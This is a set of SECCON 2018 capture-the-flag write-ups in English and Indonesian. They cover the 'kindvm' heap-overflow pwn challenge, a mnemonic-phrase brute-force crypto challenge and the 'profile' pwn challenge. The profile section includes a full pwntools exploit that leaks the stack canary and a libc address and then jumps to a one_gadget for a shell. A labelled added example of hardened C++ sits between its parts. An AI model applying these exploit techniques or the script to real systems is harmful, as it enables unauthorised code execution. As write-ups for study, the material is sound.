127 | ```cpp 128 | int insn_in() 129 | { 130 | int result; // eax 131 | unsigned __int8 v1; // [esp+Bh] [ebp-Dh] 132 | int v2; // [esp+Ch] [ebp-Ch] 133 | 134 | v1 = load_insn_uint8_t(); 135 | v2 = load_insn_uint32_t(); 136 | if ( v1 > 7u ) 137 | kindvm_abort(); 138 | result = v2; 139 | *((_DWORD *)reg + v1) = v2; 140 | return result; 141 | } 142 | 143 | int load_insn_uint32_t() 144 | { 145 | unsigned __int8 *v0; // ebx 146 | int v1; // ST0C_4 147 | unsigned __int8 *v2; // ebx 148 | int v3; // ST0C_4 149 | unsigned __int8 *v4; // ebx 150 | int v5; // ST0C_4 151 | unsigned __int8 *v6; // ebx 152 | int v7; // ST0C_4 153 | 154 | v0 = (unsigned __int8 *)insn; 155 | v1 = v0[get_pc()]; 156 | step(); 157 | v2 = (unsigned __int8 *)insn; 158 | v3 = v2[get_pc()] + (v1 << 8); 159 | step(); 160 | v4 = (unsigned __int8 *)insn; 161 | v5 = v4[get_pc()] + (v3 << 8); 162 | step(); 163 | v6 = (unsigned __int8 *)insn; 164 | v7 = v6[get_pc()] + (v5 << 8); 165 | step(); 166 | return v7; 167 | } 168 | ``` 169 | 170 | Okay. So, we need to input register (0 - 7) and number (first input is the most significant byte). 171 | Let's do reg0 = 0xffffffff and then add r0 to r0 -> r0 = -1 + -1 = -2 (still negative). 172 | ``` 173 | asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x07\x00\xff\xff\xff\xff\x04\x00\x00\n' | nc kindvm.pwn.seccon.jp 12345 174 | Input your name : Input instruction : _ _ _ 175 | | | _(_)_ __ __| |_ ___ __ ___ 176 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 177 | | <| | | | | (_| |\ V /| | | | | | 178 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 179 | 180 | Instruction start! 181 | _ _ _ _ _____ ____ _____ _____ _ 182 | | | | (_)_ __ | |_|___ / / ___| ____|_ _| | | 183 | | |_| | | '_ \| __| |_ \ | | _| _| | | | | 184 | | _ | | | | | |_ ___) | | |_| | |___ | | |_| 185 | |_| |_|_|_| |_|\__|____/ \____|_____| |_| (_) 186 | 187 | Nice try! You can cause Integer Overflow! 188 | The value became minus value. Minus value is important. 189 | ``` 190 | 191 | Nice, we got (maybe) all the hints. 
Now, we just need to read `flag.txt`. 192 | Some notes, `reg` is stored in heap. There is also `mem` stored in heap. We can store and load `mem` with the instruction load and store. 193 | 194 | The hint states about integer overflow, so maybe integer overflow in heap. 195 | Let's see what else is in the heap. 196 | ``` 197 | v0 = malloc(0x18u); 198 | kc = (int)v0; 199 | *v0 = 0; 200 | *(_DWORD *)(kc + 4) = 0; 201 | v1 = kc; 202 | *(_DWORD *)(v1 + 8) = input_username(); 203 | *(_DWORD *)(kc + 12) = "banner.txt"; 204 | *(_DWORD *)(kc + 16) = func_greeting; 205 | *(_DWORD *)(kc + 20) = func_farewell; 206 | mem = malloc(0x400u); 207 | memset(mem, 0, 0x400u); 208 | reg = malloc(0x20u); 209 | memset(reg, 0, 0x20u); 210 | insn = malloc(0x400u); 211 | result = memset(mem, 65, 0x400u); 212 | ``` 213 | 214 | So, username is in the heap (hint says it is useful), also banner.txt, func_greeting, and func_farewell. 215 | If we can overflow and write in the heap then maybe we can change func_farewell to execute anything. 216 | Let's see what func_farewell does. 217 | ```cpp 218 | ssize_t func_farewell() 219 | { 220 | open_read_write(*(char **)(kc + 12)); 221 | return write(1, "Execution is end! Thank you!\n", 0x1Du); 222 | } 223 | ``` 224 | 225 | It reads `kc+12` which is `banner.txt` and writes it! 226 | Well then, if we can change `kc+12` to `flag.txt` by rewriting it to `name` (filled with `flag.txt`), we will get the flag. 227 | Let's see the heap then. 228 | ``` 229 | gdb-peda$ x/20wx 0x804c168 230 | 0x804c168: 0x0804c180 <= name 0x080491b2 <= banner.txt 0x08048f89 <= greeting 0x08048fba <= farewell 231 | 0x804c178: 0x00000000 0x00000011 0x00000000 0x00000000 232 | 0x804c188: 0x00000000 0x00000411 0x41414141 <= mem_start 0x41414141 233 | 0x804c198: 0x41414141 0x41414141 0x41414141 0x41414141 234 | 0x804c1a8: 0x41414141 0x41414141 0x41414141 0x41414141 235 | ``` 236 | 237 | Plan: read `name` -> write it to `banner.txt`. 
238 | ``` 239 | load mem-40 to reg0 -> store reg0 to mem-36 240 | ``` 241 | 242 | ``` 243 | asdf@asdf:~/Desktop/CTF/ctf/seccon2018/classic-pwn$ echo -e 'flag.txt\n\x01\x00\xff\xd8\x02\xff\xdc\x00\x06' | nc kindvm.pwn.seccon.jp 12345 244 | Input your name : Input instruction : _ _ _ 245 | | | _(_)_ __ __| |_ ___ __ ___ 246 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 247 | | <| | | | | (_| |\ V /| | | | | | 248 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 249 | 250 | Instruction start! 251 | SECCON{s7ead1ly_5tep_by_5tep} 252 | Execution is end! Thank you! 253 | ``` 254 | Flag is captured! 255 | 256 | ## Bahasa Indonesia 257 | ``` 258 | Input your name : a 259 | Input instruction : a 260 | _ _ _ 261 | | | _(_)_ __ __| |_ ___ __ ___ 262 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 263 | | <| | | | | (_| |\ V /| | | | | | 264 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 265 | 266 | Instruction start! 267 | Error! Try again! 268 | ``` 269 | 270 | Program membaca input (1 instruksi 1 byte) dan menjalankannya. 271 | Berikut instruksinya. 272 | ``` 273 | 0 -> insn_nop; 274 | 1 -> insn_load; 275 | 2 -> insn_store; 276 | 3 -> insn_mov; 277 | 4 -> insn_add; 278 | 5 -> insn_sub; 279 | 6 -> insn_halt; 280 | 7 -> insn_in; 281 | 8 -> insn_out; 282 | 9 -> insn_hint; 283 | ``` 284 | 285 | Program memanggil `gets`! Dicoba buffer overflow. 286 | ```cpp 287 | char *input_username() 288 | { 289 | char *dest; // ST18_4 290 | size_t v1; // eax 291 | char s; // [esp+12h] [ebp-16h] 292 | unsigned int v4; // [esp+1Ch] [ebp-Ch] 293 | 294 | v4 = __readgsdword(0x14u); 295 | printf("Input your name : "); 296 | gets(&s); 297 | dest = (char *)malloc(0xAu); 298 | v1 = strlen(&s); 299 | dest[9] = 0; 300 | strncpy(dest, &s, v1); 301 | return dest; 302 | } 303 | ``` 304 | 305 | Hmm. 
306 | ``` 307 | Input your name : aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 308 | _ _ _ _ _ ____ _____ _____ _ 309 | | | | (_)_ __ | |_/ | / ___| ____|_ _| | | 310 | | |_| | | '_ \| __| | | | _| _| | | | | 311 | | _ | | | | | |_| | | |_| | |___ | | |_| 312 | |_| |_|_|_| |_|\__|_| \____|_____| |_| (_) 313 | 314 | 315 | Nice try! The theme of this binary is not Stack-Based BOF! 316 | However, your name is not meaningless... 317 | ``` 318 | 319 | Okay, lanjut. Mari panggil instruksi 9 (hint). 320 | ``` 321 | asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x09\n' | nc kindvm.pwn.seccon.jp 12345 322 | Input your name : Input instruction : _ _ _ 323 | | | _(_)_ __ __| |_ ___ __ ___ 324 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 325 | | <| | | | | (_| |\ V /| | | | | | 326 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 327 | 328 | Instruction start! 329 | _ _ _ _ ____ ____ _____ _____ _ 330 | | | | (_)_ __ | |_|___ \ / ___| ____|_ _| | | 331 | | |_| | | '_ \| __| __) | | | _| _| | | | | 332 | | _ | | | | | |_ / __/ | |_| | |___ | | |_| 333 | |_| |_|_|_| |_|\__|_____| \____|_____| |_| (_) 334 | 335 | Nice try! You can analyze vm instruction and execute it! 336 | Flag file name is "flag.txt". 337 | ``` 338 | 339 | Sip! 340 | Dapat dilihat juga terdapat hint ketiga (insn_add). 
341 | ``` 342 | _DWORD *insn_add() 343 | { 344 | _DWORD *result; // eax 345 | unsigned __int8 v1; // [esp+Ah] [ebp-Eh] 346 | unsigned __int8 v2; // [esp+Bh] [ebp-Dh] 347 | signed int v3; // [esp+Ch] [ebp-Ch] 348 | 349 | v1 = load_insn_uint8_t(); 350 | v2 = load_insn_uint8_t(); 351 | if ( v1 > 7u ) 352 | kindvm_abort(); 353 | if ( v2 > 7u ) 354 | kindvm_abort(); 355 | if ( *((_DWORD *)reg + v1) >= 0 ) 356 | v3 = 1; 357 | result = (char *)reg + 4 * v1; 358 | *result += *((_DWORD *)reg + v2); 359 | if ( v3 ) 360 | { 361 | result = (_DWORD *)*((_DWORD *)reg + v1); 362 | if ( (signed int)result < 0 ) 363 | hint3(); 364 | } 365 | return result; 366 | ``` 367 | 368 | Untuk mendapaatkan hint nilai `reg + v1` harus negatif. Mari coba buat nilai reg negatif dengan fungsi `in` (7). 369 | ```cpp 370 | int insn_in() 371 | { 372 | int result; // eax 373 | unsigned __int8 v1; // [esp+Bh] [ebp-Dh] 374 | int v2; // [esp+Ch] [ebp-Ch] 375 | 376 | v1 = load_insn_uint8_t(); 377 | v2 = load_insn_uint32_t(); 378 | if ( v1 > 7u ) 379 | kindvm_abort(); 380 | result = v2; 381 | *((_DWORD *)reg + v1) = v2; 382 | return result; 383 | } 384 | 385 | int load_insn_uint32_t() 386 | { 387 | unsigned __int8 *v0; // ebx 388 | int v1; // ST0C_4 389 | unsigned __int8 *v2; // ebx 390 | int v3; // ST0C_4 391 | unsigned __int8 *v4; // ebx 392 | int v5; // ST0C_4 393 | unsigned __int8 *v6; // ebx 394 | int v7; // ST0C_4 395 | 396 | v0 = (unsigned __int8 *)insn; 397 | v1 = v0[get_pc()]; 398 | step(); 399 | v2 = (unsigned __int8 *)insn; 400 | v3 = v2[get_pc()] + (v1 << 8); 401 | step(); 402 | v4 = (unsigned __int8 *)insn; 403 | v5 = v4[get_pc()] + (v3 << 8); 404 | step(); 405 | v6 = (unsigned __int8 *)insn; 406 | v7 = v6[get_pc()] + (v5 << 8); 407 | step(); 408 | return v7; 409 | } 410 | ``` 411 | 412 | Jadi, kita perlu memasukkan register (0 - 7) dan nilainya pada input (byte pertama pada nilai paling signifikan). 
413 | Coba reg0 = 0xffffffff dan panggil add r0 ke r0 -> r0 = -1 + -1 = -2 (seharusnya nilai masih negatif). 414 | ``` 415 | asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x07\x00\xff\xff\xff\xff\x04\x00\x00\n' | nc kindvm.pwn.seccon.jp 12345 416 | Input your name : Input instruction : _ _ _ 417 | | | _(_)_ __ __| |_ ___ __ ___ 418 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 419 | | <| | | | | (_| |\ V /| | | | | | 420 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 421 | 422 | Instruction start! 423 | _ _ _ _ _____ ____ _____ _____ _ 424 | | | | (_)_ __ | |_|___ / / ___| ____|_ _| | | 425 | | |_| | | '_ \| __| |_ \ | | _| _| | | | | 426 | | _ | | | | | |_ ___) | | |_| | |___ | | |_| 427 | |_| |_|_|_| |_|\__|____/ \____|_____| |_| (_) 428 | 429 | Nice try! You can cause Integer Overflow! 430 | The value became minus value. Minus value is important. 431 | ``` 432 | 433 | Yay, dapat (mungkin) semua hint. Sekarang kita perlu membaca `flag.txt`. 434 | Beberapa keterangan, `reg` disimpan pada heap. Selain itu ada juga `mem` yang juga disimpan di heap. Kita dapat menggunakan `mem` dengan fungsi load dan store. 435 | 436 | Hint yaitu integer overflow, mungkin integer overflow pada heap. 437 | Dicek apa saja yang terdapat pada heap. 438 | ``` 439 | v0 = malloc(0x18u); 440 | kc = (int)v0; 441 | *v0 = 0; 442 | *(_DWORD *)(kc + 4) = 0; 443 | v1 = kc; 444 | *(_DWORD *)(v1 + 8) = input_username(); 445 | *(_DWORD *)(kc + 12) = "banner.txt"; 446 | *(_DWORD *)(kc + 16) = func_greeting; 447 | *(_DWORD *)(kc + 20) = func_farewell; 448 | mem = malloc(0x400u); 449 | memset(mem, 0, 0x400u); 450 | reg = malloc(0x20u); 451 | memset(reg, 0, 0x20u); 452 | insn = malloc(0x400u); 453 | result = memset(mem, 65, 0x400u); 454 | ``` 455 | 456 | Jadi, username terdapat pada heap (kata hint username penting), terdapat juga banner.txt, func_greeting, dan func_farewell pada heap. 457 | Apabila kita dapat menulis dengan overflow pada heap, maka kita dapat mengubah func_farewell untuk mengeksekusi apapun. 
458 | Sebelumnya, dicek kegunaan func_farewell. 459 | ```cpp 460 | ssize_t func_farewell() 461 | { 462 | open_read_write(*(char **)(kc + 12)); 463 | return write(1, "Execution is end! Thank you!\n", 0x1Du); 464 | } 465 | ``` 466 | 467 | Fungsi tersebut membaca `kc+12` yang adalah `banner.txt` dan menulisnya! 468 | Jadi, jika kita ubah `kc+12` menjadi `flag.txt` dengan mengganti menjadi `name` (berisi `flag.txt`), kita dapat flag. 469 | Let's see the heap then. 470 | ``` 471 | gdb-peda$ x/20wx 0x804c168 472 | 0x804c168: 0x0804c180 <= name 0x080491b2 <= banner.txt 0x08048f89 <= greeting 0x08048fba <= farewell 473 | 0x804c178: 0x00000000 0x00000011 0x00000000 0x00000000 474 | 0x804c188: 0x00000000 0x00000411 0x41414141 <= mem_start 0x41414141 475 | 0x804c198: 0x41414141 0x41414141 0x41414141 0x41414141 476 | 0x804c1a8: 0x41414141 0x41414141 0x41414141 0x41414141 477 | ``` 478 | 479 | Rencana: baca `name` -> tulis ke `banner.txt`. 480 | ``` 481 | load mem-40 to reg0 -> store reg0 to mem-36 482 | ``` 483 | 484 | ``` 485 | asdf@asdf:~/Desktop/CTF/ctf/seccon2018/classic-pwn$ echo -e 'flag.txt\n\x01\x00\xff\xd8\x02\xff\xdc\x00\x06' | nc kindvm.pwn.seccon.jp 12345 486 | Input your name : Input instruction : _ _ _ 487 | | | _(_)_ __ __| |_ ___ __ ___ 488 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 489 | | <| | | | | (_| |\ V /| | | | | | 490 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 491 | 492 | Instruction start! 493 | SECCON{s7ead1ly_5tep_by_5tep} 494 | Execution is end! Thank you! 495 | ``` 496 | Flag didapatkan! 
--------------------------------------------------------------------------------
/seccon2018/kindvm/kindvm_79726158fec11eb1e5a89351db017e13506d3a4a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/kindvm/kindvm_79726158fec11eb1e5a89351db017e13506d3a4a
--------------------------------------------------------------------------------
/seccon2018/mnemonic/README.md:
--------------------------------------------------------------------------------
# mnemonic
---
**Points:** 260 | **Solves:** 62/653 | **Category:** Crypto

Read me.

[Download](mnemonic.txt)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
During the contest, we didn't know that this challenge was related to blockchain. With some googling, we found the term *mnemonic* and this [json file](https://github.com/trezor/python-mnemonic/blob/master/vectors.json), which looks just like our challenge file. Reading that project's Python code told us what our challenge file is.

```json
{
    // language
    "japanese": [
        [
            // entropy
            "d3a02b9706507552f0e70709f1d4921275204365b4995feae1d949fb59c663cc",
            // mnemonic
            "ふじみ あさひ みのう いっち いがく とない はづき ますく いせえび たれんと おとしもの おどろかす ことし おくりがな ちょうし ちきゅう さんきゃく こんとん せつだん ちしき ぬいくぎ まんなか たんい そっと",
            // seed
            "338c161dbdb47c570d5d75d5936e6a32178adde370b6774d40d97a51835d7fec88f859e0a6660891fc7758d451d744d5d3b1a1ebd1123e41d62d5a1550156b1f"
        ],
        // ...
}
```

Our goal is to find the entropy that starts with `c0f`, given a mnemonic with one word missing. We can brute-force the Japanese word list and verify that the derived seed starts with `e9a`. Using this script, we got the flag.

```python
import sys
from binascii import hexlify, unhexlify
from mnemonic import Mnemonic
from hashlib import md5

def b2h(b):
    h = hexlify(b)
    return h if sys.version < '3' else h.decode('utf8')

mnemo = Mnemonic("japanese")
words = "とかす なおす よけい ちいさい さんらん けむり ていど かがく とかす そあく きあい ぶどう こうどう ねみみ にあう ねんぐ ひねる おまいり いちじ ぎゅうにく みりょく ろしゅつ あつめる"
words = mnemo.normalize_string(words).split(" ")
for word in mnemo.wordlist:
    guess = [word] + words
    seed = Mnemonic.to_seed(" ".join(guess), passphrase="")
    if not b2h(seed).startswith("e9a"):
        continue

    entropy = b2h(mnemo.to_entropy(guess))
    if entropy.startswith("c0f"):
        print(entropy)
        print("SECCON{%s}" % (md5(entropy.encode()).hexdigest()))
        break
```

Flag: `SECCON{cda2cb1742d1b6fc21d05c879c263eec}`

## Bahasa Indonesia
During the contest, we did not know that this challenge was related to blockchain. With Google's help, we found the term *mnemonic* and a [json file](https://github.com/trezor/python-mnemonic/blob/master/vectors.json) that resembles the challenge. We also studied its Python code and finally understood the meaning of the strings in the challenge.

```json
{
    // language
    "japanese": [
        [
            // entropy
            "d3a02b9706507552f0e70709f1d4921275204365b4995feae1d949fb59c663cc",
            // mnemonic
            "ふじみ あさひ みのう いっち いがく とない はづき ますく いせえび たれんと おとしもの おどろかす ことし おくりがな ちょうし ちきゅう さんきゃく こんとん せつだん ちしき ぬいくぎ まんなか たんい そっと",
            // seed
            "338c161dbdb47c570d5d75d5936e6a32178adde370b6774d40d97a51835d7fec88f859e0a6660891fc7758d451d744d5d3b1a1ebd1123e41d62d5a1550156b1f"
        ],
        // ...
}
```

Our goal is to find the entropy that begins with the string `c0f`, given a mnemonic with one word removed. We can brute-force the Japanese words in the wordlist and verify that the seed begins with the string `e9a`.
Using this script, we obtained the flag.

```python
import sys
from binascii import hexlify, unhexlify
from mnemonic import Mnemonic
from hashlib import md5

def b2h(b):
    h = hexlify(b)
    return h if sys.version < '3' else h.decode('utf8')

mnemo = Mnemonic("japanese")
words = "とかす なおす よけい ちいさい さんらん けむり ていど かがく とかす そあく きあい ぶどう こうどう ねみみ にあう ねんぐ ひねる おまいり いちじ ぎゅうにく みりょく ろしゅつ あつめる"
words = mnemo.normalize_string(words).split(" ")
for word in mnemo.wordlist:
    guess = [word] + words
    seed = Mnemonic.to_seed(" ".join(guess), passphrase="")
    if not b2h(seed).startswith("e9a"):
        continue

    entropy = b2h(mnemo.to_entropy(guess))
    if entropy.startswith("c0f"):
        print(entropy)
        print("SECCON{%s}" % (md5(entropy.encode()).hexdigest()))
        break
```

Flag: `SECCON{cda2cb1742d1b6fc21d05c879c263eec}`
--------------------------------------------------------------------------------
/seccon2018/mnemonic/mnemonic.txt:
--------------------------------------------------------------------------------
{
    "japanese": [
        [
            "d3a02b9706507552f0e70709f1d4921275204365b4995feae1d949fb59c663cc",
            "ふじみ あさひ みのう いっち いがく とない はづき ますく いせえび たれんと おとしもの おどろかす ことし おくりがな ちょうし ちきゅう さんきゃく こんとん せつだん ちしき ぬいくぎ まんなか たんい そっと",
            "338c161dbdb47c570d5d75d5936e6a32178adde370b6774d40d97a51835d7fec88f859e0a6660891fc7758d451d744d5d3b1a1ebd1123e41d62d5a1550156b1f"
        ],
        [
            "dfc9708ac4b4e7f67be6b8e33486482cb363e81967a1569c6fd888b088046f7c",
            "ほんやく ごうきゅう おさめる たこやき ごかん れいぎ やせる ふるい まんなか てんない だんろ さうな きぼう よくぼう しのぐ よけい こんき みうち らくご いわかん いこく あたためる のはら たぶん",
            "bdadda5bbff97eb4fda0f11c7141bc3ce3de0fef0b2e4c47900858cec639c10187aee4695b1ba462b1dd34b170b62801e68c270b93af62629f4964947a620ed9"
        ],
        [
            "c0f...",
            "??? とかす なおす よけい ちいさい さんらん けむり ていど かがく とかす そあく きあい ぶどう こうどう ねみみ にあう ねんぐ ひねる おまいり いちじ ぎゅうにく みりょく ろしゅつ あつめる",
            "e9a..."
        ],
    ],
    "flag": "SECCON{md5(c0f...)}"
}

--------------------------------------------------------------------------------
/seccon2018/profile/README.md:
--------------------------------------------------------------------------------
# Profile
---
**Points:** 255 | **Solves:** 64/653 | **Category:** Pwn

Host: profile.pwn.seccon.jp
Port: 28553

[Download](profile_e814c1a78e80ed250c17e94585224b3f3be9d383)
[Download](libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
```
gdb-peda$ file profile_e814c1a78e80ed250c17e94585224b3f3be9d383
Reading symbols from profile_e814c1a78e80ed250c17e94585224b3f3be9d383...(no debugging symbols found)...done.

gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
```

The challenge is a simple binary that stores and prints a message.

```
Please introduce yourself!
Name >> test
Age >> 21
Message >> nothing

1 : update message
2 : show profile
0 : exit
>>
```

The prompt loops, so users can update the message and show the profile as many times as they want.
Note that name and message are C++ strings, so even a long input will not cause a buffer overflow (a long string is stored on the heap).

Because of the string data type (and int for age), let's assume that input_name, input_age, and input_message are not vulnerable.
Also, since we do not control anything in show_profile, the vulnerability most likely lives in update_message.

Below is a snippet of update_message (IDA decompiled).

```cpp
__int64 __fastcall Profile::update_msg(Profile *this)
{
    __int64 v1; // rax
    __int64 result; // rax
    void *ptr; // [rsp+10h] [rbp-10h]
    size_t v4; // [rsp+18h] [rbp-8h]

    ptr = (void *)std::__cxx11::basic_string,std::allocator>::c_str(this);
    v4 = malloc_usable_size(ptr);
    if ( v4 == 0 )
    {
        v1 = std::operator<<>(&std::cout, "Unable to update message.");
        result = std::ostream::operator<<(v1, &std::endl>);
    }
    else
    {
        std::operator<<>(&std::cout, "Input new message >> ");
        result = getn((char *)ptr, v4);
    }
    return result;
}
```

We can write to message up to the return value of malloc_usable_size(message).
So how are C++ strings stored? A big string gets a heap allocation of the string's size.
However, there is a thing called Small String Optimization (SSO): it avoids that allocation by storing a small string on the stack.

What would malloc_usable_size(message) return if message is small, then?

```
call 0x400e90
=> 0x4010be : mov QWORD PTR [rbp-0x8],rax
...

gdb-peda$ p $rax
$1 = 0xfffffffffffffff0
```

It returns a very large number (really a negative value read as unsigned), which means we can write past the buffer and overflow the stack.
Let's analyze how the program stores name, age, and message.

```
__int64 __fastcall Profile::set_name(__int64 a1, __int64 a2)
{
    return std::__cxx11::basic_string,std::allocator>::operator=(a1 + 32, a2);
}

Profile *__fastcall Profile::set_age(Profile *this, int a2)
{
    Profile *result; // rax

    result = this;
    *((_DWORD *)this + 16) = a2;
    return result;
}

__int64 __fastcall Profile::set_msg(__int64 a1, __int64 a2)
{
    return std::__cxx11::basic_string,std::allocator>::operator=(a1, a2);
}
```

Basically, `set_msg` writes to `Profile + 0`, `set_name` to `Profile + 32`, and `set_age` to `Profile + 64`.
Below is the state of the allocated Profile (small strings for message and name).

```
gdb-peda$ x/12gx 0x7fff85a09e90
0x7fff85a09e90: 0x00007fff85a09e60 <= pointer to msg   0x0000000000000002 <= msg length
0x7fff85a09ea0: 0x0000000000006161 0x0000000000000000
0x7fff85a09eb0: 0x00007fff85a09e80 <= pointer to name   0x0000000000000007 <= name length
0x7fff85a09ec0: 0x0061616161616161 0x0000000000000000
0x7fff85a09ed0: 0x0000000000000001 <= age   0xef86cdc445a5ec00 <= canary
0x7fff85a09ee0: 0x00007fff85a09fd0 0x0000000000000000
0x7fff85a09ef0: 0x00000000004016b0 <= ret address   0x00007ffff74791c1 <= __libc_start_main+240

```

We can write as much as we want starting from msg (0x7fff85a09ea0), but there is a canary.
We can leak the canary by partially overwriting (the first byte of) pointer_to_name so that show_profile prints the canary.

We could leak through (in this example) 0x00007fff85a09e00 - 0x00007fff85a09eff to get a consistent read of the canary.
However, for this challenge I just put `d9` in the partial overwrite (the canary's first byte is always 0x00). Randomization is on, so the first byte of the canary's address can be 0xf8, 0xe8, 0x38, etc., but it is always aligned, so the chance of it being 0xd9 is not low.
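The SSO point above is what makes `malloc_usable_size` the wrong tool in `update_msg`: a short string's bytes live inside the string object, not in a malloc chunk, so there is no chunk header to measure. The code below is an added example, not the challenge's code; it checks where a `std::string` keeps its data and shows an `update_msg` that lets the string size itself instead of trusting the allocator. The `Profile` struct is constructed to mirror the `set_msg`/`set_name`/`set_age` offsets in the writeup, and the offset comments assume libstdc++'s 32-byte `std::string`.

```cpp
// Added example, not the challenge's code: where a std::string keeps its bytes (inside the
// object for short strings, on the heap otherwise) and an update_msg() that never sizes a
// write by malloc_usable_size(). The Profile layout below is constructed to mirror the
// set_msg/set_name/set_age offsets in the writeup.
#include <cstddef>
#include <cstdint>
#include <istream>
#include <sstream>
#include <string>
#include <utility>

// True when data() points inside the std::string object itself, i.e. the SSO buffer is in
// use. A Profile on the stack then holds the message bytes on the stack, and there is no
// malloc chunk header in front of them for malloc_usable_size() to read.
bool is_sso(const std::string &s) {
    auto data = reinterpret_cast<std::uintptr_t>(s.data());
    auto self = reinterpret_cast<std::uintptr_t>(&s);
    return data >= self && data < self + sizeof(s);
}

struct Profile {
    std::string msg;   // Profile + 0
    std::string name;  // Profile + 32 on libstdc++ (sizeof(std::string) == 32, an assumption)
    int age;           // Profile + 64
};

// Hardened update_msg: read at most `limit` characters into a fresh string and assign it.
// The string grows itself; no raw pointer and no allocator query are involved.
bool update_msg(Profile &p, std::istream &in, std::size_t limit) {
    std::string line;
    if (!std::getline(in, line)) return false;
    if (line.size() > limit) line.resize(limit);
    p.msg = std::move(line);
    return true;
}

// Drive update_msg() on a constructed profile; returns the stored message.
std::string demo_update(const std::string &input, std::size_t limit) {
    Profile p{"aa", "aaaaaaa", 1};  // constructed values, same lengths as the writeup's "aa" / 7 x 'a'
    std::istringstream in(input);
    update_msg(p, in, limit);
    return p.msg;
}
```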
199 | 200 | ```python 201 | from pwn import * 202 | 203 | context.arch = "amd64" 204 | context.os = "linux" 205 | 206 | def debug(p): 207 | if (len(sys.argv) > 1 and sys.argv[1] == "debug"): 208 | util.proc.wait_for_debugger(util.proc.pidof(p)[0]) 209 | 210 | ### end of template 211 | 212 | p = remote('profile.pwn.seccon.jp', 28553) 213 | # p = process('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383') 214 | binelf = ELF('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383') 215 | binlib = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253') 216 | 217 | # initialize 218 | p.sendline('abcdefgh') 219 | p.sendline('16961') 220 | p.sendline('abcdefg') 221 | p.recvuntil('exit') 222 | 223 | found = False 224 | for i in range(16): 225 | idx = 15-i 226 | 227 | p.sendline('1') 228 | p.sendline('A' * 0x10 + chr(idx * 0x10)) 229 | p.sendline('2') 230 | p.recvuntil('Name : ') 231 | log.debug(idx) 232 | name = p.recvline() 233 | if name.startswith('AB') and idx-2 >= 0: 234 | age_on = idx 235 | name_on = idx-1 236 | name_ptr = idx-2 237 | p.sendline('1') 238 | p.sendline('A' * 0x10 + chr(name_ptr*0x10)) 239 | p.sendline('2') 240 | p.recvuntil('Name : ') 241 | name_leak = u64(p.recvline().strip().ljust(8, '\x00')) 242 | found = True 243 | break 244 | 245 | if not found: 246 | log.error('Failed, Try again') 247 | exit(0) 248 | 249 | canary_leak = name_leak + 0x28 250 | log.info('Name leak at {}'.format(hex(name_leak))) 251 | log.info('Canary leak at {}'.format(hex(canary_leak))) 252 | 253 | p.sendline('1') 254 | p.sendline('A' * 0x10 + p64(canary_leak)) 255 | p.sendline('2') 256 | p.recvuntil('Name : ') 257 | canary = u64(p.recvline().strip().ljust(8, '\x00')) 258 | 259 | log.info('Canary {}'.format(hex(canary))) 260 | 261 | p.sendline('1') 262 | p.sendline('A' * 0x10 + p64(binelf.got['read'])) 263 | p.sendline('2') 264 | p.recvuntil('Name : ') 265 | read_loc = u64(p.recvline().strip().ljust(8, '\x00')) 266 | one_gadget = 0x45216 267 | one_gadget_loc = read_loc + 
one_gadget - binlib.symbols['read'] 268 | 269 | log.info('One Gadget {}'.format(hex(one_gadget_loc))) 270 | 271 | p.sendline('1') 272 | p.sendline('\x00' * 0x38 + p64(canary) + '\x00' * 0x18 + p64(one_gadget_loc)) 273 | 274 | p.sendline('0') 275 | 276 | p.interactive() 277 | ``` 278 | 279 | ## Bahasa Indonesia 280 | ``` 281 | gdb-peda$ file profile_e814c1a78e80ed250c17e94585224b3f3be9d383 282 | Reading symbols from profile_e814c1a78e80ed250c17e94585224b3f3be9d383...(no debugging symbols found)...done. 283 | 284 | gdb-peda$ checksec 285 | CANARY : ENABLED 286 | FORTIFY : disabled 287 | NX : ENABLED 288 | PIE : disabled 289 | RELRO : Partial 290 | ``` 291 | 292 | Diberikan sebuah binary untuk menambahkan pesan dan menampilkan pesan. 293 | 294 | ``` 295 | Please introduce yourself! 296 | Name >> test 297 | Age >> 21 298 | Message >> nothing 299 | 300 | 1 : update message 301 | 2 : show profile 302 | 0 : exit 303 | >> 304 | ``` 305 | 306 | Pengguna dapat menambah dan menampilkan pesan berulang, tidak ada maksimum iterasi. 307 | Tipe data untuk name dan message adalah string, jadi tidak akan terjadi buffer overflow meskipun input panjang (akan disimpan pada heap). 308 | 309 | Karena menggunakan string (dan int untuk age), asumsi bahwa input_name, input_age, dan input_message tidak vulnerable. 310 | Selain itu, kita tidak memiliki kontrol atas show_profile sehingga kemungkinan vulnerability tidak ada pada fungsi tersebut juga. 311 | 312 | Berikut fungsi update_message (dekompilasi ida). 
